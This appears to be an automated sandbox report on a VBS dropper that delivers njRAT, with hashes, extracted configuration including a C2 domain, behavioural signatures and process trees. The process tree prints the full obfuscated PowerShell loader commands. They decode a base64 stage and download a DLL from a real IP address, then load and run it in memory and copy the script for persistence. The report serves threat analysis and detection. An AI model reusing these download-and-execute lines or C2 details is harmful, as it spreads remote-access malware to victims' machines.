Analysis
max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags
arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted
01/09/2022, 17:17
Static task
static1
Behavioral task
behavioral1
Sample
Acta Referencial Del Caso Penal RDV-09939778312.vbs
Resource
win7-20220812-en
General
Target
Acta Referencial Del Caso Penal RDV-09939778312.vbs
Size
344KB
MD5
f756f1aa3b657845808b1b6dd2e417c6
SHA1
d3f93f3093a7b6491890fcb816ddd4dc0b498fe0
SHA256
7d7b58a161db20052b11323229ef2a0289d7bd60fa43ae054589b9d3f895cde5
SHA512
d0904aff71248c4e3b3a6267b79de255d77a52f6b90578e68f769bee70d56e521fbf2f10ae7864c26be5b8dd54b6f2914885cced6ec1551a9b98dfa482d274aa
SSDEEP
96:LELC6OuuvYUZelhkMtm0eW2hCugT5fqR+5Z9fAWxn42Of7bsITJYYmI1e5fKq373:TLgMmZ9YI0zwNYmtSqLyzfu
Malware Config
Extracted
http://20.7.14.99/server/dll.txt
Extracted
Family: njrat
Version: 0.7NC
Botnet: NYAN CAT
C2: agostiando.duckdns.org:8080
Mutex: 12b010cb2cf4431e
Attributes
reg_key: 12b010cb2cf4431e
splitter: @!#&^%$
Signatures
Blocklisted process makes network request 2 IoCs
flow  pid   Process
13    4532  powershell.exe
15    4532  powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                  Process
Key value queried  \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation  WScript.exe
Drops startup file 1 IoCs
description   ioc                                                                                      Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk  powershell.exe
Suspicious use of SetThreadContext 1 IoCs
description                          pid   Process         procid_target
PID 4532 set thread context of 4624  4532  powershell.exe  93
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid   Process
4264  powershell.exe
4264  powershell.exe
4532  powershell.exe
4532  powershell.exe
4536  powershell.exe
4536  powershell.exe
4532  powershell.exe
4532  powershell.exe
Suspicious use of AdjustPrivilegeToken 36 IoCs
description                        pid   Process
Token: SeDebugPrivilege            4264  powershell.exe
Token: SeDebugPrivilege            4532  powershell.exe
Token: SeDebugPrivilege            4536  powershell.exe
Token: SeDebugPrivilege            4624  RegAsm.exe
(the following pair of rows repeats 16 times, 32 entries in total)
Token: 33                          4624  RegAsm.exe
Token: SeIncBasePriorityPrivilege  4624  RegAsm.exe
Suspicious use of WriteProcessMemory 17 IoCs
description                       pid   Process         procid_target
PID 524 wrote to memory of 4264   524   WScript.exe     84
PID 524 wrote to memory of 4264   524   WScript.exe     84
PID 4264 wrote to memory of 4532  4264  powershell.exe  86
PID 4264 wrote to memory of 4532  4264  powershell.exe  86
PID 4532 wrote to memory of 4536  4532  powershell.exe  87
PID 4532 wrote to memory of 4536  4532  powershell.exe  87
PID 4532 wrote to memory of 400   4532  powershell.exe  92
PID 4532 wrote to memory of 400   4532  powershell.exe  92
PID 4532 wrote to memory of 400   4532  powershell.exe  92
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
PID 4532 wrote to memory of 4624  4532  powershell.exe  93
Processes
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Acta Referencial Del Caso Penal RDV-09939778312.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:524
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⏏⏏Bw⏏⏏Ek⏏⏏QwB3⏏⏏HY⏏⏏I⏏⏏⏏⏏9⏏⏏C⏏⏏⏏⏏Jw⏏⏏l⏏⏏G8⏏⏏YgB6⏏⏏GU⏏⏏cQB1⏏⏏Gk⏏⏏bw⏏⏏l⏏⏏Cc⏏⏏OwBb⏏⏏EI⏏⏏eQB0⏏⏏GU⏏⏏WwBd⏏⏏F0⏏⏏I⏏⏏⏏⏏k⏏⏏EQ⏏⏏T⏏⏏BM⏏⏏C⏏⏏⏏⏏PQ⏏⏏g⏏⏏Fs⏏⏏UwB5⏏⏏HM⏏⏏d⏏⏏Bl⏏⏏G0⏏⏏LgBD⏏⏏G8⏏⏏bgB2⏏⏏GU⏏⏏cgB0⏏⏏F0⏏⏏Og⏏⏏6⏏⏏EY⏏⏏cgBv⏏⏏G0⏏⏏QgBh⏏⏏HM⏏⏏ZQ⏏⏏2⏏⏏DQ⏏⏏UwB0⏏⏏HI⏏⏏aQBu⏏⏏Gc⏏⏏K⏏⏏⏏⏏o⏏⏏E4⏏⏏ZQB3⏏⏏C0⏏⏏TwBi⏏⏏Go⏏⏏ZQBj⏏⏏HQ⏏⏏I⏏⏏BO⏏⏏GU⏏⏏d⏏⏏⏏⏏u⏏⏏Fc⏏⏏ZQBi⏏⏏EM⏏⏏b⏏⏏Bp⏏⏏GU⏏⏏bgB0⏏⏏Ck⏏⏏LgBE⏏⏏G8⏏⏏dwBu⏏⏏Gw⏏⏏bwBh⏏⏏GQ⏏⏏UwB0⏏⏏HI⏏⏏aQBu⏏⏏Gc⏏⏏K⏏⏏⏏⏏n⏏⏏Gg⏏⏏d⏏⏏B0⏏⏏H⏏⏏⏏⏏Og⏏⏏v⏏⏏C8⏏⏏Mg⏏⏏w⏏⏏C4⏏⏏Nw⏏⏏u⏏⏏DE⏏⏏N⏏⏏⏏⏏u⏏⏏Dk⏏⏏OQ⏏⏏v⏏⏏HM⏏⏏ZQBy⏏⏏HY⏏⏏ZQBy⏏⏏C8⏏⏏Z⏏⏏Bs⏏⏏Gw⏏⏏LgB0⏏⏏Hg⏏⏏d⏏⏏⏏⏏n⏏⏏Ck⏏⏏KQ⏏⏏7⏏⏏Fs⏏⏏UwB5⏏⏏HM⏏⏏d⏏⏏Bl⏏⏏G0⏏⏏LgBB⏏⏏H⏏⏏⏏⏏c⏏⏏BE⏏⏏G8⏏⏏bQBh⏏⏏Gk⏏⏏bgBd⏏⏏Do⏏⏏OgBD⏏⏏HU⏏⏏cgBy⏏⏏GU⏏⏏bgB0⏏⏏EQ⏏⏏bwBt⏏⏏GE⏏⏏aQBu⏏⏏C4⏏⏏T⏏⏏Bv⏏⏏GE⏏⏏Z⏏⏏⏏⏏o⏏⏏CQ⏏⏏R⏏⏏BM⏏⏏Ew⏏⏏KQ⏏⏏u⏏⏏Ec⏏⏏ZQB0⏏⏏FQ⏏⏏eQBw⏏⏏GU⏏⏏K⏏⏏⏏⏏n⏏⏏EM⏏⏏b⏏⏏Bh⏏⏏HM⏏⏏cwBM⏏⏏Gk⏏⏏YgBy⏏⏏GE⏏⏏cgB5⏏⏏DM⏏⏏LgBD⏏⏏Gw⏏⏏YQBz⏏⏏HM⏏⏏MQ⏏⏏n⏏⏏Ck⏏⏏LgBH⏏⏏GU⏏⏏d⏏⏏BN⏏⏏GU⏏⏏d⏏⏏Bo⏏⏏G8⏏⏏Z⏏⏏⏏⏏o⏏⏏Cc⏏⏏UgB1⏏⏏G4⏏⏏Jw⏏⏏p⏏⏏C4⏏⏏SQBu⏏⏏HY⏏⏏bwBr⏏⏏GU⏏⏏K⏏⏏⏏⏏k⏏⏏G4⏏⏏dQBs⏏⏏Gw⏏⏏L⏏⏏⏏⏏g⏏⏏Fs⏏⏏bwBi⏏⏏Go⏏⏏ZQBj⏏⏏HQ⏏⏏WwBd⏏⏏F0⏏⏏I⏏⏏⏏⏏o⏏⏏Cc⏏⏏YQ⏏⏏1⏏⏏DM⏏⏏ZQBk⏏⏏GM⏏⏏NQ⏏⏏3⏏⏏DY⏏⏏YwBk⏏⏏DM⏏⏏LQ⏏⏏w⏏⏏Dc⏏⏏Z⏏⏏Bi⏏⏏C0⏏⏏NQ⏏⏏y⏏⏏Dg⏏⏏N⏏⏏⏏⏏t⏏⏏GI⏏⏏YQBk⏏⏏DQ⏏⏏LQ⏏⏏2⏏⏏DE⏏⏏O⏏⏏Bj⏏⏏DM⏏⏏Z⏏⏏⏏⏏1⏏⏏GY⏏⏏PQBu⏏⏏GU⏏⏏awBv⏏⏏HQ⏏⏏JgBh⏏⏏Gk⏏⏏Z⏏⏏Bl⏏⏏G0⏏⏏PQB0⏏⏏Gw⏏⏏YQ⏏⏏/⏏⏏HQ⏏⏏e⏏⏏B0⏏⏏C4⏏⏏YQBz⏏⏏GU⏏⏏cgBU⏏⏏GM⏏⏏dQBE⏏⏏C8⏏⏏bw⏏⏏v⏏⏏G0⏏⏏bwBj⏏⏏C4⏏⏏d⏏⏏Bv⏏⏏H⏏⏏⏏⏏cwBw⏏⏏H⏏⏏⏏⏏YQ⏏⏏u⏏⏏DI⏏⏏Ng⏏⏏w⏏⏏GQ⏏⏏O⏏⏏⏏⏏t⏏⏏HM⏏⏏ZQBu⏏⏏G8⏏⏏aQBj⏏⏏GE⏏⏏YwBp⏏⏏G4⏏⏏bwBt⏏⏏G8⏏⏏YwBl⏏⏏Gw⏏⏏ZQB0⏏⏏C8⏏⏏Yg⏏⏏v⏏⏏D⏏⏏⏏⏏dg⏏⏏v⏏⏏G0⏏⏏bwBj⏏⏏C4⏏⏏cwBp⏏⏏H⏏⏏⏏⏏YQBl⏏⏏Gw⏏⏏ZwBv⏏⏏G8⏏⏏Zw⏏⏏u⏏⏏GU⏏⏏ZwBh⏏⏏HI⏏⏏bwB0⏏⏏HM⏏⏏ZQBz⏏⏏GE⏏⏏YgBl⏏⏏HI⏏⏏aQBm⏏⏏C8⏏⏏Lw⏏⏏6⏏⏏HM⏏⏏c⏏⏏B0⏏⏏HQ⏏⏏a⏏⏏⏏⏏n⏏⏏Ck⏏⏏KQ⏏⏏=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⏏⏏','A') ) ).replace('%obzequio%','');powershell.exe -Command $VXdfe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4264
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('a53edc576cd3-07db-5284-bad4-618c3d5f=nekot&aidem=tla?txt.aserTcuD/o/moc.topsppa.260d8-senoicacinomocelet/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:400
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4624
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize
2KB
MD5
6cf293cb4d80be23433eecf74ddb5503
SHA1
24fe4752df102c2ef492954d6b046cb5512ad408
SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Filesize
1KB
MD5
7ae41ba310b3e0f4fc4c6eff982554fd
SHA1
1a382df614c494ff947f88817b9f0fbc76de3a68
SHA256
93939edea4456184f43eeffda4f6e82f125bf5cead24cebcf317aa3fe83efcce
SHA512
8e13185cab71046bb411dae56ccaabd547d3bf961c200fc307f2961eb9caf175dd08631ecf6512578dd333dac3640e653f93115c840b3344648f2a597e789223

Filesize
64B
MD5
feadc4e1a70c13480ef147aca0c47bc0
SHA1
d7a5084c93842a290b24dacec0cd3904c2266819
SHA256
5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512
c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23